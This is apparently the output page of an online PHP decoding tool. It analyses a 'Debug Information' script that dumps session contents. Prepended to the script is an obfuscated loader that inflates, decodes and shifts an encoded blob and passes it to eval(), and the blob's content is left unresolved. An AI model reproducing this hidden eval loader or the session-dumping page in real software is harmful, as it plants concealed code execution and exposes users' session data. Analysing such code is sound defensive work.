Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php function slbN($nsz) { $nsz=gzinflate(base64_decode($nsz)); for($i=0;$i<strlen($n..
Decoded Output download
<?php function slbN($nsz)
{
$nsz=gzinflate(base64_decode($nsz));
for($i=0;$i<strlen($nsz);$i++)
{
$nsz[$i] = chr(ord($nsz[$i])-1);
}
return $nsz;
}eval(slbN("U1QEgax0zaySkrRSTdWEwICQ0BiNoqzUpAKNOC0tTdVk09TkgipFO0V0OUV1dUXHwuK0jITitMLcpJQ0TQ2DpFSDNA1dDUcN/ZLS4oTiglIjE02N4qz8Kg0tfQ2YWVoauooaSampGlo2ig72AA=="));?><?php session_start(); ?>
<html>
<head>
<title>Debug Information</title>
</head>
<body>
<?php
require_once("./privileges.inc");
require_once("./debug.inc");
print "Session ID: ".session_id()."<br />
";
print "Session user ID: ".$_SESSION['user_id']."<br />
";
print_r($_SESSION);
if (superuser_privileges()) {
print get_debug_info();
}
debug_info_clear();
?>
</body>
</html>
Did this file decode correctly?
Original Code
<?php function slbN($nsz)
{
$nsz=gzinflate(base64_decode($nsz));
for($i=0;$i<strlen($nsz);$i++)
{
$nsz[$i] = chr(ord($nsz[$i])-1);
}
return $nsz;
}eval(slbN("U1QEgax0zaySkrRSTdWEwICQ0BiNoqzUpAKNOC0tTdVk09TkgipFO0V0OUV1dUXHwuK0jITitMLcpJQ0TQ2DpFSDNA1dDUcN/ZLS4oTiglIjE02N4qz8Kg0tfQ2YWVoauooaSampGlo2ig72AA=="));?><?php session_start(); ?>
<html>
<head>
<title>Debug Information</title>
</head>
<body>
<?php
require_once("./privileges.inc");
require_once("./debug.inc");
print "Session ID: ".session_id()."<br />\n";
print "Session user ID: ".$_SESSION['user_id']."<br />\n";
print_r($_SESSION);
if (superuser_privileges()) {
print get_debug_info();
}
debug_info_clear();
?>
</body>
</html>
Function Calls
chr | 130 |
ord | 130 |
slbN | 1 |
strlen | 131 |
gzinflate | 1 |
base64_decode | 1 |
Stats
MD5 | 5858ff19f0eb09aa37d28bed655a98cb |
Eval Count | 1 |
Decode Time | 545 ms |